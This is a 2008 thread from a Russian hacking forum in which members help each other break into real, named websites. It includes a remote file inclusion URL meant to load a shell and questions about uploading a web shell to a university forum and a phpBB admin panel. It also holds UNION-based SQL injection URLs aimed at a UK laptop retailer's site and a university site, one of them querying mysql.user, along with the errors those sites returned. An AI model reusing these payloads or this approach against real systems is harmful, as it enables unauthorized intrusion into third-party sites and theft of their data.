26.03.2008, 21:53
|
|
Участник форума
Регистрация: 06.03.2008
Сообщений: 105
Провел на форуме:
253346
Репутация:
146
|
|
у меня вопрос по php include,
запрос вида .php?page=http://site.ru/xz.txt? выводит текст файла,почему не запускается shell?
|
|
|
26.03.2008, 21:58
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523
Репутация:
1174
|
|
потому, что он не воспринимается, как php-файл
|
|
|
|
26.03.2008, 22:01
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
1.
у меня вопрос по php include,
запрос вида .php?page=http://site.ru/xz.txt? выводит текст файла,почему не запускается shell?
Потому что это не инклуд а читалка файлов
2.
.php?page=http://site.ru/xz.PHP попробуй
Мда. Ты админ хакерского форума?
3.
потому, что он не воспринимается, как php-файл
При инклуде любое расширение будет выполняться (пытаться выполниться) как php код.
Это не инклуд |
|
|
|
26.03.2008, 22:23
|
|
Участник форума
Регистрация: 06.03.2008
Сообщений: 105
Провел на форуме:
253346
Репутация:
146
|
|
спасибо за ответы))
|
|
|
|
27.03.2008, 21:08
|
|
Постоянный
Регистрация: 22.03.2008
Сообщений: 325
Провел на форуме:
1208132
Репутация:
63
|
|
Это серьёзно?Можн залить shell?
http://studsovet.ulsu.ru/forum/
Cори если не по теме
|
|
|
|
27.03.2008, 22:20
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Error performing query: Mixing of GROUP columns (MIN(),MAX(),COUNT()...) with no GROUP columns is illegal if there is no GROUP BY clause
юзал юнион,написало вот такое чудо )).Хотел узнать,почему выдаёт такую ошибку,и каким образом мона ещё выбрать все столбцы.Груп бай мона юзать только для определения кол.-ва столбцов,как я понял,но не выбирать(какойнить там злоссный груп селект ) ))))))))).
P.S. Help o_O )
|
|
|
|
27.03.2008, 22:28
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458
Репутация:
3965
|
|
прив, народ, блин никак не получается залить шелл в пхпбб. есть админка. не раскритих путей. аватары на нормальность проверяються (не только расширение)
Такое пробовал (http://forum.antichat.ru/showpost.php?p=198446&postcount=3)
__________________
BlackHat. MoDL
Последний раз редактировалось Dimi4; 27.03.2008 в 22:34..
|
|
|
|
27.03.2008, 22:30
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
>> Это серьёзно?Можн залить shell?
http://studsovet.ulsu.ru/forum/
Cори если не по теме
Там уже кто то постарался:
IPB WARNING [2] ipsclass::load_template(/usr/virtual/studsovet.ulsu.ru/html/forum/cache/skin_cache/cacheid_/skin_global.php) [http://www.php.net/manual/en/function.load-template.html]: failed to open stream: No such file or directory (Line: 1327 of /sources/ipsclass.php)
>> Error performing query: Mixing of GROUP columns (MIN(),MAX(),COUNT()...) with no GROUP columns is illegal if there is no GROUP BY clause
юзал юнион,написало вот такое чудо )).Хотел узнать,почему выдаёт такую ошибку,и каким образом мона ещё выбрать все столбцы.Груп бай мона юзать только для определения кол.-ва столбцов,как я понял,но не выбирать(какойнить там злоссный груп селект ) ))))))))).
P.S. Help o_O )
Сразу давай ссылку. |
|
|
|
27.03.2008, 22:41
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Ж(.Сам хотел воть...ну лан,на )))
http://www.laptopshowcase.co.uk/suppliers.php?id=-4+union+select+1,2,3,4,5,6,7,8,9/*
|
|
|
|
27.03.2008, 23:49
|
|
Постоянный
Регистрация: 22.03.2008
Сообщений: 325
Провел на форуме:
1208132
Репутация:
63
|
|
Error performing query: Mixing of GROUP columns (MIN(),MAX(),COUNT()...) with no GROUP columns is illegal if there is no GROUP BY clause
Ээээ... .
http://www.laptopshowcase.co.uk/suppliers.php?id=-4+UNION+SELECT+1,2+FROM+suppliers.id--
Помойму это похоже на ->
Сообщение от K1nD[e]R
2 Buffalon
Access denied for user 'studsovet'@'localhost' to database 'mysql'
Код:
http://studsovet.ulsu.ru/index.php?pid=8&fac=-1+UNION+SELECT+1,2,3,4,5+from+mysql.user/*
Нет прав на просмотр юзеров |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
